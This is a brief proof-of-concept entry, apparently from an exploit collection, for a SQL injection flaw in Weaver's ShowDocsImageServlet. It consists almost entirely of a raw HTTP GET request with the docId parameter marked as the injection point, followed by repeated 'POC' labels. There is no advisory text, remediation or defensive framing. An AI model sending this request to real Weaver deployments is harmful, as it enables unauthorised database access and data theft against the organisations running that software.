泛微ShowDocsImagesql注入漏洞

POC

GET
/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) 
Accept-Encoding: gzip, deflate
Connection: close

POC​

POC